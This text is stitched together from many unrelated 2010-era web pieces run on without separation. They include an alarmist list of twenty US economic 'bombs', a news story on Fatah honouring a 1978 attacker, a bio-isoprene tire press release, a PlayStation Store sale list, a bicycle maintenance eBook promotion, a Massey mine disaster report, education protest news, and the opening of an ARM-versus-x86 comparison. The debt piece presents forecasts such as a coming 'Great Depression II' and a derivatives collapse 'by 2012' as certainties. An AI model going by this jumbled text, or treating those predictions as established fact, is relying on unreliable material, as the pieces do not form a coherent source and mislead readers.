Federal debt limit was just raised almost 100 % with Obama 's 2010 budget , to $ 14.3 trillion vs. $ 7.8 trillion in 2005 .
The Congressional Budget Office predicts future deficits around 4 % through 2020 .
Get it ?
America 's debt at 84 % of GDP will soon pass that toxic 90 % trigger point .
2. U.S. Foreign Trade Bomb .
Monthly deficits actually dropped from $ 50 billion per month to roughly $ 35 billion .
But the total continues climbing as $ 400 billion is added each year .
Foreigners now own $ 2.5 trillion of America , with China holding over $ 1.3 trillion in Treasury debt .
3. Weakening U.S. Dollar as Foreign Reserve Currency Bomb .
Fear China and other currencies will replace dollar as main foreign reserves .
The dollar 's fallen :
The main index measuring dollar strength has gone from 120 at the Clinton - to - Bush handoff to below 80 today .
4. Cheap Money Bomb : Credit Ratings Down , Rates Up. Economists at S&P , Fitch and Moody's were totally co-conspirators of Fat Cat Bankers , misleading investors before meltdown : Soon , debt up , ratings down , interest rates soar .
5. Global Real Estate Bomb .
Dubai Tower , new " world 's tallest building " is empty .
BusinessWeek warns that China 's housing collapse could be worse than America's .
Plus the U.S. commercial real estate bubble is now $ 1.7 trillion , a " ticking time bomb " bloating 25 % of bank balance sheets .
6. Peak Oil and the Population Bomb .
China and India each need 500 new cities .
The United Nations estimates world population exploding 50 % from 6 billion to 9 billion by 2050 :
Three billion more humans demanding more automobiles , exhausting more resources to feed their version of the gas - guzzling " America Dream . "
7. Social Security Bomb .
We have no choice ; eventually we must either cut benefits or raise taxes .
Politicians hate both , so they 'll do nothing .
Delays worsen solutions .
Without action , by 2035 Social Security and Medicare benefits will eat up the entire federal budget other than defense .
8. Medicare : A Nuclear Bomb .
Going broke faster than Social Security .
Prescription drug benefit added an unfunded $ 8.1 trillion .
In 5 years estimates rose from about $ 35 trillion to over $ 60 trillion now .
9. Health - care Insurance Bomb .
Burden increasingly shifted to employees .
Costs rising faster than inflation .
Recent Obamacare plan would have cost $ 90 billion annually , paid to Big Pharma and insurers .
10 . State and Local Government Budget Bombs .
Deficits of $ 110 billion in 2010 , $ 178 billion in 2011on top of more that $ 450 billion in underfunded state and municipal employee pension funds .
11 . Underfunded Corporate Pensions Bomb .
From $ 60 billion surplus in 2007 to $ 409 billion deficit in 2009 .
And a whopping 92 % of the pension plans of companies are now underfunded .
Defaults are guaranteed by taxpayers .
12 . Consumer Debt Bomb .
Americans are still living beyond their means .
Even with a downturn , consumer debt rose from about $ 2.3 to $ 2.5 trillion .
Fat Cat Bankers love it -- yes love making matters worse by gouging cardholders and mortgagees , blocking help in foreclosures and bankruptcies .
13 . Personal Savings Bomb .
Before the 2008 meltdown savings rate dropped from about 10 % in the early 1980s to below zero .
Now it 's increasing , slowing retail recovery .
Today , government 's the big " unsaver . "
14 . War and Military Defense Deficits .
Costs of Iraq and Afghanistan wars -- $ 200 + billion annually , $ 3 trillion minimum , with massive long - term costs for veteran medical care , equipment renewal , recruitment .
15 . Homeland Insecurity Bomb .
Security at airports , seaports , borders , vulnerable chemical plants all increase budgets .
16 . Fed / Treasury Bailout Bombs .
Tax credits , loans , cash and purchase of toxic assets from Wall Street banks estimated at $ 23.7 trillion as new debt was shifted from too - big - to - fail Fat - Cat banks to taxpayers .
17 . Insatiable Washington Lobbyists Bombs .
Paulson , Goldman , Geithner , Morgan and Wall Street banks , through their lobbyists and former employees working inside now have absolute power over government spending .
Democracy and voters are now irrelevant in America 's new corporate - socialism .
18 . Shadow Banking : The Derivatives Bomb .
Wall Street wants no regulation of this $ 670 trillion , high - risk , out - of - control casino that 's highly leveraged versus the $ 50 trillion total GDP of all nations .
We forget that derivatives almost destroyed global economies in 2008 - 09 , finally will by 2012 .
19 . Dysfunctional Two - Party Political Bomb .
Polarized partisanship increasing : Every day both parties show zero interest in cooperating for the public good .
Instead they fight viciously , resisting everything and anything proposed by opponents .
Only goal : Score political points , make the other side look bad .
20 . The Coming Populous Rebellion Bombs .
Nobody trusts anyone in authority .
For good reason .
So immediate gratification , short - term betting and a lack of long - term perspective wins for individual investors , consumers and taxpayers as well as Washington , Wall Street and Corporate America CEOs .
Today : " Doing what 's right for the common good and country " is just empty political rhetoric .
Forbes .
The Economist .
Davos - World Economic Forum .
Bloomberg BusinessWeek .
All one voice , one loud , lonely chorus echoing that famous Beatles tune : " Head in a cloud ...
The fool on the hill , sees the sun going down ... a thousand voices talking perfectly loud .
But nobody ever hears him , or the sound he appears to make ...
And the eyes in his head , see the world spinning ' round ... ooh , round and round and round . "
Historians and behavioral economists tell us most investors are blind optimists .
Investors cannot see bubbles from inside their bubble .
Nor Fat Cat Bankers from inside their mega - bonus - bubble .
Nor politicians from inside the beltway bubble .
Why ?
The optimist 's brain filters out bad news .
They know their dreams of prosperity will come true .
Then , when they finally do see that the proverbial light at the end of the tunnel is an oncoming train , it 's always too late .
I will say it again , gently : A new meltdown is coming .
The Great Depression II is coming , soon .
And yet , I know your mental filters are working , blocking warnings of a bomb .
I can even hear you calling me " the fool on the hill who sees the sun going down , the world spinning round " ... sees you kissing your retirement goodbye .
EL BIREH , West Bank — Dozens of Palestinian students from the youth division of Fatah , the mainstream party led by President Mahmoud Abbas , gathered here on Thursday to dedicate a public square to the memory of a woman who in 1978 helped carry out the deadliest terrorist attack in Israel ’s history .
Though one senior Fatah leader and a Palestinian Authority security official joined the gathering in this town abutting Ramallah , the administrative center of the authority , the relatively low key nature of the event , timed to the 32d anniversary of the attack , was a kind of compromise .
An official ceremony was put off by the Palestinian Authority as a result of Israeli protests and to avoid an unnecessary embarrassment during a visit to the region by the American vice president , Joseph R. Biden Jr. , who came partly to promote new Israeli - Palestinian peace talks .
The woman being honored , Dalal Mughrabi , was the 19 - year - old leader of a Palestinian squad that sailed from Lebanon and landed on a beach between Haifa and Tel Aviv .
They killed an American photojournalist , hijacked a bus and commandeered another , embarking on a bloody rampage that left 38 Israeli civilians dead , 13 of them children , according to official Israeli figures .
Ms. Mughrabi and several other attackers were killed .
To Israelis , hailing Ms. Mughrabi as a heroine and a martyr is an act that glorifies terrorism .
But , underscoring the chasm between Israeli and Palestinian perceptions , the Fatah representatives described Ms. Mughrabi as a courageous fighter who held a proud place in Palestinian history .
Defiant , they insisted that they would not let Israel dictate the names of Palestinian streets and squares .
Motorists will be driving on the world 's first " green " tires within the next five years , scientists have predicted , thanks to a revolutionary new technology that produces a key tire ingredient from renewable feedstocks rather than petroleum - derived feedstocks .
The technology , described at the 239th National Meeting of the American Chemical Society ( ACS ) in San Fransisco March 24 , stands to reduce the tire industry 's reliance on crude oil -- seven gallons of which now go into each of the approximately one billion tires produced each year worldwide .
The new tires will be a " sweet " advance toward greener , more sustainable transportation in a quite literal sense , according to Joseph McAuliffe , Ph.D. , who reported on the technology .
The process can use sugars derived from sugar cane , corn , corn cobs , switchgrass or other biomass to produce the ingredient , a biochemical called isoprene , derived from renewable raw materials
" An intensive search has been underway for years for alternative sources of isoprene , in particular those from renewable resources such as biomass , " said McAuliffe .
He is a staff scientist at Genencor , an industrial biotechnology company in Palo Alto , Calif .
" One technical challenge has been the development of an efficient process for converting sugars into isoprene .
One means by which we 're addressing this challenge is by using a fermentation process based on a modified bacterial strain that is designed to convert carbohydrate feedstocks into BioIsoprene™ product . "
The Goodyear Tire & Rubber Co. and Genencor , a division of Danisco A/S , have established a research collaboration to develop an integrated fermentation , recovery and purification system for producing BioIsoprene™ product from renewable raw materials .
Genencor intends to commercialize the technology within the next five years .
In his ACS presentation , McAuliffe described how Genencor engineered bacteria to efficiently convert sugars to isoprene and how the smooth integration of fermentation and recovery processes promises to deliver a new route to this strategically important ingredient used to make synthetic rubber .
Goodyear and other large tire manufacturers use isoprene to produce synthetic rubber for use in tires to supplement use of natural rubber .
Additionally , isoprene is used in a wide range of other industrial applications including , for example : use in other elastomers ; block copolymers such as styrene - isoprene - styrene ( SIS ) used in hot melt adhesives in products such as diapers and feminine hygiene products ; surgical gloves and other rubber - based products .
Worldwide production of high purity isoprene derived today from petroleum - based feedstocks totals about 1.7 billion pounds .
Goodyear , which manufactures 200 million tires annually , is one of the world 's largest users of isoprene .
The firm plans to supplement its use of petroleum - based isoprene with BioIsoprene™ product .
" This is an enormous market , " McAuliffe said .
" BioIsoprene ™ product will serve as a renewable and cost - competitive alternative to isoprene .
It 's a material that can drive new markets , so I believe those numbers highlighting global consumption would grow if new material became available . "
" We want to make biochemicals from renewable materials , " McAuliffe said , " partially as a hedge against rising crude oil prices and much more so because this approach moves us to a more sustainable future . "
Hi Everyone – It ’s time for the weekly PlayStation Store Update .
Please note – PlayStation Store will be moving to a Tuesday publish starting next week 5/4 .
This week Spring Fever highlights the PixelJunk Franchise !
Up to 50 % off all PixelJunk PS3 Games .
Offers good through Monday , 5/3 .
PixelJunk 3 - in - 1 Pack ( Bundle ) ( Sale price $ 9.99 , regular price $ 19.99 )
( Sale price $ 9.99 , regular price $ 19.99 ) PixelJunk Racers ( PS3 ) ( Sale price $ 4.99 , regular price $ 6.99 )
( Sale price $ 4.99 , regular price $ 6.99 ) PixelJunk Eden ( PS3 ) / PixelJunk Monsters ( PS3 ) / PixelJunk Shooter ( PS3 ) ( Sale price $ 4.99 each , regular price $ 9.99 each )
Updates
LittleBigPlanet : Street Fighter Costumes Sale – Chun -Li , Guile , Ryu and Zangief ( now $ 0.99 , original price $ 1.99 )
( now $ 0.99 , original price $ 1.99 ) LittleBigPlanet : Street Fighter Costume Pack Sale ( now $ 2.99 , original price $ 5.99 )
( now $ 2.99 , original price $ 5.99 ) Fortix Minis Sale ( now $ 3.99 , original price $ 4.99 )
Downloadable Games
Record of Agarest War ( $ 44.99 )
Leonhardt , a young military officer , must sacrifice his life , his soul , and his future to seal the pillars of the gods on each of Agarest ’s five continents .
Will his children — who suffer the same fate — find a world of light , or one of darkness , at the end of their long battle ?
Only the future will tell …
ERSB Rated T
File size : 9.01 GB
Kick - Ass ( $ 14.99 )
Kick - Ass is a third - person action fighting game , and it is based on the movie of the same name .
The game takes the player through 12 different mission areas of New York , facing petty thugs and even powerful mob bosses .
The player chooses any of the 3 Superheros , Kick - Ass , Big Daddy , or Hit - Girl .
Each Superhero has their own special and unique weapons for fighting .
The player ’s main goal is to bring justice back to the city — at any cost .
ERSB Rated M
File size : 949 MB
PS one Classics
Star Wars Dark Forces ( $ 5.99 )
Follow Kyle Katarn , ex Imperial Army personnel , as he works as a mercenary for the Rebel Alliance .
What dark secrets will he find ?
Download this PS one Classic today !
ESRB Rated T
File size : 309 MB
Game Demos ( free )
Wakeboarding HD Demo
Wakeboarding HD
Demo contains two missions and tutorial .
Grab your board and hold on tight !
The Demo drops players into a high - speed , water - filled , arcade experience to maneuver through tracks , perform high - flying tricks , collect bonuses and avoid dangers .
Show your skills and wreak havoc as the bright and colorful tropical paradise resort transforms into an action - packed extreme playground .
ESRB Rated E
File size : 119 MB
Add -on Game Content
Blue Toad Murder Files Episode 4 : Death From Above ( $ 7.49 )
Episode 1 required to play .
As the death count of Little Riddle rises , the funeral of the latest victim provides the backdrop for the latest act of villainy .
Who will be next to suffer in the hands of the evil mastermind ?
Join the Blue Toad detectives to solve the puzzles and mysteries of Little Riddle .
Episode 4 of 6 .
This product supports the following languages :
In - game speech : English ; On - screen text : English .
File size : 366 MB
Blue Toad Murder Files Episode 5 : The Riddles Of The Past ( $ 7.49 )
Episode 1 required to play .
Your super sleuth instinct has uncovered the true criminal of Little Riddle but you need solid evidence to convince the law before they throw you out of the village .
Can you convince the Inspector in time or will the trivialities of the villagers get in your way ?
Episode 5 of 6 .
This product supports the following languages :
In - game speech : English ; On - screen text : English .
File size : 381 MB
Blue Toad Murder Files Episode 6 : Flight Of The Felonious Fugitive ( $ 7.49 )
Episode 1 required to play .
The felonious fugitive is on the run and only a Blue Toad detective can stop them .
With the support of the villagers and finally the Inspector can you catch the criminal and put an end to their crime spree once and for all ?
Episode 6 of 6 .
This product supports the following languages :
In - game speech : English ; On - screen text : English .
File size : 385 MB
Blue Toad Murder Files Episodes 4 - 6 Bundle Pack ( $ 14.99 )
Episode 1 required to play .
Purchase episodes 4 - 6 for a special discounted price .
Played solo or up to four players locally , can you unravel the secrets of Little Riddle ?
This product supports the following languages :
In - game speech : English ; On - screen text : English .
File size : 1.11 GB
MAG – Fast Attack Gear Pack ( free )
Strike fast , strike hard and get out .
With the Fast Attack Gear Pack , the enemy wo n’t know you ’re there until it ’s all over .
This gear pack has everything for the soldier that craves speed with additional survivability : a reinforced light armor package combined with all new Special Edition Sniper Rifles provide the best of both worlds .
File size : N / A
Just Cause 2 : Black Market Aerial Pack ( $ 1.99 )
A pack of must - have downloadable items to help you to cause maximum aerial chaos .
File size : 3.71 MB
Record Of Agarest War : Add - On Dungeon 1 : Generation 1 Holy Island Of Erin ( free )
An add - on dungeon for generation 1 .
An uncharted adventure awaits you on the [ Holy Island of Erin ] !
File size : 2.33 MB
Record Of Agarest War : Add - On Dungeon 2 : Generation 2 Trum Coast ( free )
An add - on dungeon for generation 2 .
A new frontier waits to be explored along the [ Trum Coast ] !
Note : Can only be reached if you have chosen the coastal path
File size : 2.33 MB
Record Of Agarest War : Item Pack 1 : Recovery Kit ( free )
A set of recovery items .
It contains 3 [ Grass ] that recover HP , 3 [ Cure Grass ] , and 3 [ Fragment of Life ] that recover the inability to fight .
These items are necessities for all adventurers .
You ’re in good hands as long as you have this with you .
File size : 2.33 MB
Record Of Agarest War : Item Pack 2 : Skill Set ( free )
A set of skills .
It contains [ Heal ] , which recovers HP ; [ Refresh ] , which removes any status abnormality ; and [ Capture ] , which makes it possible to have monsters join your party .
[ Capture ] is an especially reassuring skill to have .
Do n’t miss this chance to get it for yourself !
File size : 2.33 MB
Record Of Agarest War : Points Pack 1 : Trial Point Pack ( free )
A set containing 1,000G and a bunch of ability points ( 50 PP , 100TP , and 100 EP ) .
Try it for yourself .
File size : 2.33 MB
Megaman 10 Endless Attack ( $ 2.99 )
Test your skills on a stage without end .
Try to break the record for getting the farthest .
Results will be displayed in the Leaderboards .
Not compatible with Trophies or Challenges .
File size : 1.28 MB
Megaman 10 Special Stage 2 ( $ 0.99 )
Gives you another Time Attack Stage to try , including a new Boss at the end !
Results will be displayed in the Rankings .
Not compatible with Trophies or Challenges .
File size : 1.16 MB
Megaman 10 Special Stage 3 ( $ 0.99 )
Gives you another Time Attack Stage to try , including a new Boss at the end !
Results will be displayed in the Rankings .
Not compatible with Trophies or Challenges .
File size : 1.15 MB
Super Street Fighter IV Super Challengers Costume Pack 1 ( $ 3.99 )
Download the first pack of alternate costumes for Super Street Fighter IV !
New costumes for Hakan , Makoto , Guy , Dudley and Dee Jay are included .
Throw on your new gear and go to town on the opposition .
File size : 100 KB
Dante ’s Inferno Trials of St. Lucia ( $ 9.99 )
ESRB Rated M
File size : 1 GB
Guitar Hero 5
For all song credits please visit www.guitarhero.com.
“ After Forever ” by Black Sabbath ( $ 1.99 )
“ Into the Void ” by Black Sabbath ( $ 1.99 )
“ Sweet Leag ” by Black Sabbath ( $ 1.99 )
Black Sabbath Track Pack ( $ 5.49 ) – Downloadable Track Pack featuring “ After Forever ” , “ Into The Void ” , and “ Sweet Leaf ” by Black Sabbath .
Please Note : Many songs are available both as singles and as part of a Track Pack , so please carefully consider your purchases before downloading .
File size : 51 MB – 58 MB ( singles ) , 159 MB ( track pack )
Rock Band
Build your Rock Band library by purchasing these song game tracks .
For song credits , visit www.RockBand.com.
“ Again ” – Flyleaf ( $ 1.99 )
“ Thunderbirds Are Go ! ” – Busted ( $ 1.99 )
“ Tomorrow ” – Silverchair ( $ 1.99 )
Rock Band Network
“ Burn It Down ” by Five Finger Death Punch ( $ 1.99 )
“ Business Time ” by Flight of the Conchords ( $ 1.99 )
“ Lady in a Blue Dress ” by Senses Fail ( $ 1.99 )
“ Push Push ( Lady Lightning ) ” by Bang Camaro ( $ 0.99 )
“ Stick Stickly ” – by Attack !
Attack ! ( $ 1.99 )
File size : 24 MB – 33 MB ( singles )
Game Videos ( free )
ModNation Racers : Artist Spotlight – Ted Price
ModNation Racers presents a series of videos that showcase creative individuals from different walks of life .
Watch as Gaming Icons , Vinyl Artis , and Professional Drivers express themselves in ModNation Racers .
In our first episode , meet Ted Price , founder of Insomniac Games , as he shares his thoughts on his love of the industry & science fiction while he uses ModNation Racers to make Ratchet and Clank ’s girlfrends !
File size : 170 MB ( HD )
ModNation Racers : Artist Spotlight – David Jaffe
ModNation Racers presents a series of videos that showcase creative individuals from different walks of life .
From Gaming Icons to Vinyl Artists , anyone can express themselves in ModNation Racers .
In our second episode , David Jaffe , legendary creator of the Twisted Metal and God of War franchises , shares his personal take on game development , his impressions of ModNation Racers , and his feelings on the custom Kratos and Sweet Tooth Mods .
File size : 151 MB ( HD )
ModNation Racers : Artist Spotlight – Sucker Punch
ModNation Racers presents a series of videos that showcase creative individuals from different walks of life .
Watch as Gaming Icons , Vinyl Artists , and Professional Drivers express themselves in ModNation Racers .
In our third episode , we talk to the talented crew of Sucker Punch Productions !
What do the creators of Sly Cooper and InFAMOUS do when they get their hands on ModNation ’s Track Studio ?
They recreate Empire City of course !
File size : 158 MB ( HD )
UNCHARTED 2 : Siege Expansion Pack – “ The Highrise ” Flythrough Trailer
Download the flythrough trailer for “ The Highrise ” multiplayer map from the “ Siege Expansion Pack ” today !
File size : 43 MB ( HD )
UNCHARTED 2 : Siege Expansion Pack – “ The Museum ” Flythrough Trailer
Download the flythrough trailer for “ The Museum ” multiplayer map from the “ Siege Expansion Pack ” today !
File size : 61 MB ( HD )
3D Dot Game Heroes “ Dot - Mart ” Trailer
Where do heroes do their shopping ?
Watch this short vignette and find out !
Retro chic meets modern sleek in this , the ultimate love letter to retro gamers .
Seamlessly fusing new and old , the golden era of gaming is felt in every detail of this adventure .
File size : 34 MB ( HD )
Skate 3 Demo Trailer
Team up and throw down with the SKATE 3 Demo , available now .
File size : 46 MB ( HD )
Topatoi : Bundle Trailer
topatoi for the PlayStation 3 system is a platform / adventure saga that brings your screen to life with classic platforming gameplay over a variety of interactive and colorful levels in full 3D .
Watch the trailer for both “ The Great Tree Story ” and “ Pillar of the Skies ” episodes today and get the feeling of the mysterious worlds of topatoi .
File size : 87 MB ( HD )
Spider - Man : Shattered Dimensions Reveal Trailer
Spider - Man is back !
In this action - packed adventure explore four dramatically different parallel universes , each with its own Spider - Man armed with unique strengths .
Explore stunning environments , wield explosive powers , and face epic boss battles against extraordinary foes .
Two worlds are known .
Two more will be revealed .
Experience the Spider - Man like never before : Four unique worlds .
Four distinct Spider - Men .
One unparalleled experience !
File size : 76 MB ( HD ) 126 MB ( 1080 )
PS3 Themes
Megaman 10 Dynamic Theme 3 ( $ 2.99 )
File size : 353 KB
Shatter Dynamic Theme ( $ 2.99 )
File size : 3.61 MB
White Knight Chronicles International Edition – Travelers Dynamic Theme ( $ 2.99 )
File size : 5.67 MB
Winter Wonderland ( $ 1.99 )
File size : 5.21 MB
Frisco Sunset ( $ 1.99 )
File size : 4.49 MB
Black Oil Crud ( $ 1.99 )
File size : 2.46 MB
NBA Premium Theme ( x14 ) ( $ 1.99 )
File size : 4.95 MB – 5.23 MB
Dragunov ( $ 1.99 )
File size : 8.45 MB
PS3 Wallpaper
Tecmo Bowl Throwback Wallpaper ( free )
File size : 101 KB ( SD ) , 506 KB ( 1080 )
Music
Shatter Soundtrack ( $ 5.99 )
File size : 208 MB
PlayStation Store for PSP
Downloadable Games ( also available from PS3 Storefront )
2010 FIFA World Cup ( $ 39.99 )
EA SPORTS celebrates the single largest sporting event on the planet with the only official and exclusively licensed videogame on the PSP system for the 2010 FIFA World Cup South Africa .
ESRB Rated E
File size : 1.14 GB
2010 FIFA World Cup – French ( $ 39.99 )
ESRB Rated E
File size : 1.13 GB
PSP minis ( also available from PS3 Storefront )
Normaltanks ( $ 4.99 )
ESRB Rated E10 +
File size : 9.63 MB
Reef Aquarium ( $ 4.99 )
ESRB Rated E
File size : 8.27 MB
Car Jack Streets ( $ 4.99 )
ESRB Rated T
File size : 84 MB
Pile Up ! Bakery ( PSP Only – $ 1.99 )
ESRB Rated E
File size : 6 MB
Pinball Duel ( PSP Only – $ 1.99 )
ESRB Rated E
File size : 7.1 MB
Music Quiz ( PSP Only – $ 1.99 )
ESRB Rated E
File size : 34 MB
Game Videos ( free )
ModNation Racers : Artist Spotlight – Sucker Punch
File size : 27 MB
ModNation Racers : Artist Spotlight – Ted Price
File size : 29 MB
ModNation Racers : Artist Spotlight – David Jaffe
File size : 24 MB
PSP Themes ( also available from PS3 Storefront )
NBA Premium PSP Themes ( x14 ) ( $ 1.49 )
File size : 352 KB – 397 KB
Black Oil Crud – Dab PSP
Theme ( $ 1.49 )
File size : 292 KB
Black Oil Crud – Glop PSP
Theme ( $ 1.49 )
File size : 430 KB
Sushi PSP
Theme 1 ( $ 1.49 )
File size : 564 KB
Sushi PSP
Theme 2 ( $ 1.49 )
File size : 581 KB
Bare Elements – Data PSP
Theme ( $ 1.49 )
File size : 453 KB
Bare Elements – Fire PSP
Theme ( $ 1.49 )
File size : 365 KB
Right click here and choose “ save file as … ” to download
If you enjoy the eBook , you may also enjoy our newsletter .
Enter your first name and email below to subscribe .
Bicycle Maintenance Made Ridiculously Easy
A well looked after bike is a pleasure to ride .
Yet when you first start cycling this is the one area often ignored .
Soon you find the breaks not as responsive , the gears keep skipping and everything starts squeaking .
After a short while you find yourself not enjoying your cycling as much as you could be .
Luckily you do n’t have to pay £ 40 at the bike shop every time something goes wrong .
By following a few simple checklists every month you can keep that new bike feeling for longer .
I do n’t think that bicycle maintenance needs to be the realm of just hardcore enthusiasts and bike mechanics .
The simple repairs , which is probably all you will ever have to do , are possible for anyone to do themselves .
This is exactly why this guide is here .
It ’s for the everyday cyclist who wants to learn a few tricks about how the bike works .
After all you are spending all these hours every week on your bike dedicating a maximum of one hour every month to check everything over is n’t a big request .
What is included in the eBook
The eBook takes you through two checklists .
The first if a quick pre-ride check to make sure things do n’t start falling off as you start pedalling !
The second is checklist of things you should be doing every month to make sure your bike keeps running smoothly .
These are pretty essential things that any bike owner should know .
Then I also go through some of the typical repairs you may need to do .
These include fixing a flat , checking for chain wear and adjusting brakes .
Finally the eBook gives away some of the tricks I use to make sure I stay on top of bike maintenance .
What others had to say about the eBook
Bicycle maintenance made ridiculously easy is an excellent resource for beginning cyclists who wish to save money by taking care of their own equipment .
More experienced cyclists will likely find some of the maintenance tips , and the excellent monthly checklist , useful as well .
James Thomas , BicycleDesign
This publication takes all of the mystery out of the dark art of bicycle maintenance and shows it to be so everyday and ordinary as to be easy !
Download it now and you need never put up with annoying gears or have to blush in ignorance in your local bike shop again .
Mark Ames , iBikeLondon
Bicycle Maintenance Made Ridiculously
Easy is exactly what it claims to be – a simple how - to guide for maintaining the condition of your bike .
If you can learn to make these few common repairs to your bike , you can handle just about any problem you might encounter while out on the road .
With specific sections covering the tools , maintenance schedules , basic repairs , and tweaks that need to be made , it is a simple , down - to - earth handbook for anyone new to bicycle upkeep .
Darren Alff , Bicycle Touring Pro
Should n’t you be selling this ?
Perhaps , but bicycle maintenance is one of the things that really got in my way when I first started cycling .
It took me a while to realise that I only needed to do a few basic things every month to make life a lot easier for myself .
I did n’t want anyone else to be put off by bike maintenance so I wanted to give away this free eBook to teach some of the basics in a very simple , easy to follow way .
If you want to repay me then all I ask in return is that you subscribe to the newsletter so I can keep you up to date with goings on about London Cyclist .
How do I get a copy ?
Right click here and choose “ save file as … ” to download
President Obama ordered flags lowered to half - staff throughout West Virginia April 12 mourning the 29 miners who died in an explosion at Massey Energy ’s Upper Big Branch Mine a week earlier .
Rescue teams found the bodies of four missing miners , pushing the death toll to 29 , the worst mine disaster in nearly three decades .
United Mine Workers President Cecil Roberts told MSNBC ’s Ed Show April 9 that the UMW had conducted three campaigns to unionize the huge underground mine , one of 47 Massey mines that employ 5,400 miners , all but a handful of them denied union protection .
Massey Energy CEO
Don Blankenship , a notorious corporate exploiter obsessed with maximum production and profits , spearheaded the campaign to block the union , Roberts charged .
“ This guy , making $ 30 - some million in 2005 , went inside the coal mine and sat down with every single worker and said : ‘ If you vote for the union , you ’re not going to have a job because I will close this mine down . ' ”
Roberts said the first UMW representation election was a “ tie vote , ” adding , “ We lose on all ties .
We had 65 to 70 percent of the workers signed cards and they wanted the union but they could n’t get a union . ”
“ If we had had the Employee Free Choice Act , this mine would have been union a long time ago , ” Roberts said .
He was referring to legislation to make it easier for workers to win union rights when a majority sign cards in favor of union recognition .
United Steelworkers President Leo Gerard linked the Massey miners ’ tragedy to the deaths of five workers at Tesoro Oil ’s refinery in Anacortes , Wash . , April 2 .
Both the Massey mine and the Tesoro refinery had been cited repeatedly for safety and health violations .
The owners , said Gerard , “ consider safety fines just another cost of doing business . ”
It is time to make penalties so high , and enforced so vigorously , that they sharply cut into profits , he said .
“ Another crucial factor is the ability to charge CEOs with criminal negligence ” for flagrant health and safety violations , the Steelworkers leader said .
“ Republicans and Tea Partiers are running around like Chicken Little screaming that government is too big , ” continued Gerard .
“ Thirty workers killed in explosions in four days is what happens when government is too small … ”
Roberts pointed out that in the past decade , 49 miners have died in Massey mines , calling it an “ intolerable ” toll .
Coal companies have tied up 19,000 federal Mine Safety and Health Administration safety and health citations in endless challenges , he said .
“ MSHA cannot shut them down due to a pattern of violations because this is the appeals process …
We need to fix this right away . ”
Miners , he charged , are afraid to report explosive gas and coal dust for fear of company retaliation .
“ What we need to do is put some teeth in it and say you cannot be fired , you cannot be disciplined , you can not be discharged if you come forward . ”
Roberts said Republicans gutted a 2006 mine safety bill introduced after the Sago Mine disaster that killed 12 miners .
The bill was so weakened that its author , Rep. George Miller , D - Calif. , voted against it as did House Speaker Nancy Pelosi .
The House enacted a stronger bill in 2008 but President Bush threatened to veto it and the Democrats lacked the votes to override .
Roberts praised Obama for appointing veteran UMW safety official Joe Main to lead MSHA .
“ For the first time in history … a member of the UMW was appointed to head MSHA .
The workers have one of their own running the agency right now , ” Roberts said .
Photo : From left , Candi McMillian , her husband Tony Jones , and Elena Newson stand over the casket of miner William Roosevelt Lynch of Oak Hill , W.Va. , during funeral services on Sunday , April 11 , in Beckley , W.Va .
Lynch was one of 29 miners who died in the explosion at Massey Energy Co. ’s Upper Big Branch mine in Montcoal , W. Va. ( AP / Jeff Gentner )
From Humboldt State in the north to UC San Diego in the south and many colleges , high schools and elementary campuses in between , the lessons Thursday will be in how to protest state cuts in education funding .
Rallies , teach-ins and student walkouts are scheduled throughout California , and around the nation , in what organizers describe as a " Day of Action " in opposition to teacher layoffs , furlough days and rising student fees .
Much of the day ’s activities are being organized by labor unions and student government organizations , which predict that thousands of students , faculty and staff will participate .
In the Los Angeles area , events are planned Thursday morning and afternoon at , among other campuses , UCLA , Cal State Long Beach , Cal State Northridge and Santee High School .
The largest rally is expected to start at 4 p.m. at downtown Los Angeles ’ Pershing Square , followed by a march to the state office building on Spring Street that houses an office for the governor .
Campus police forces said they are preparing for large turnouts that might spill into surrounding neighborhoods in places such as Westwood and Berkeley .
Last week , demonstrators in Berkeley damaged a UC building under renovation and then set fire to trash cans in the nearby Telegraph Avenue shopping district , and officials fear a repeat of that Thursday .
-- Larry Gordon
More breaking news in L.A. Now :
Villaraigosa shocked at celebration of O.J. Simpson , RuPaul , Dennis Rodman at L.A. Black History Month event
O.C. alert system broke down during tsunami advisory
DNA match of semen found on Chelsea King 's clothing led to sex offender 's arrest , officials say
Baca says early inmate releases ' inevitable ' if budget crisis continues
Baca says early inmate releases ' inevitable ' if budget crisis continues
[ digg- reddit - me ]
Unfortunately , as it ’s a college game , there ’s no slow - mo replay .
Fordham rallies from 9 - 1 down to tie game .
With score tied at 9 in the bottom of the 8th and bases loaded , Chris Walker ( # 4 ) puts Fordham ahead with game - winning hit .
The baserunner at first , Brian Kownacki , scores by leaping over Iona catcher James Beck , and landing on home plate with a handstand , to put Fordham ahead 12 - 9 , which was the final score .
This map shows the current global BOINC activity in GigaFLOPS .
The number shown when you mouse over a country is the current GigaFLOPS produced by BOINC participents of that country .
You can zoom in on the map by holding down the left mouse button and draging the mouse over the area you wish to zoom in to .
Values are in GigaFLOPSNo data< 11 - 5051 - 100101 - 500501 - 1,0001,001 - 5,0005,001 - 10,00010,001 - 20,00020,001 - 50,00050,001 - 100,000100,001 +
Narcotics , murder , incest , and curse words are not usually a successful recipe for a preschool play .
But one gang of tots is taking YouTube by storm with their ( ostensibly ) amateur production of Scarface , the 1983 gangster flick starring Al Pacino as a coke - snorting drug lord .
In the preschool version , posted by a YouTube user who lists " Bartonsville , IL " as her hometown , popcorn stands in for cocaine and the kids favor " fudge " as a curse .
Predictably , controversy has ensued : " Is this what the education system is doing , is this what tax dollars are being spent on ? ! ” one outraged viewer wrote Chicago 's NBC affiliate after it aired the clip .
But according to TMZ , the clip is actually a fake , directed by same filmmakers who made the video for Lady Gaga 's song " Poker Face . "
The Bartonsville public school in question is actually preparing a production of The Diary of Anne Frank .
Watch the apparent hoax :
We 're Open and Here to Serve You
During this challenging time , we know that it is important to be able to get the essentials you need to feed your family .
Our Fresh Market is open & ready to help .
Visit your local store to stock up today .
We are working to keep the store clean to protect our customers and employees .
if you see a recipe or something you like — cut , paste and print all you like .
the only thing i ask is to please credit me on your site with a link back if you decide you 'd like to use something i've done :D
Introduction
In this in - depth analysis , we will discuss the emerging competition between ARM and x86 microprocessors .
Led by the Intel Atom , x86 chips are quickly migrating downwards into embedded , low - power environments , while ARM CPUs are beginning to flood upwards into the more sophisticated and demanding market spaces currently owned by x86 processors .
The central focus of this report will be an extensive compute performance comparison between the ARM Cortex - A8 versus the new Intel Atom N450 , the new VIA Nano L3050 and , for historical perspective , an old AMD Mobile Athlon based upon the Barton core .
The Apple iPad A4 system - on - chip [ SoC ] is equipped with a 1GHz ARM Cortex - A8 .
The Coming War : ARM versus x86
Over the last few years a war has been brewing .
Two armies have been massing troops in their respective strongholds .
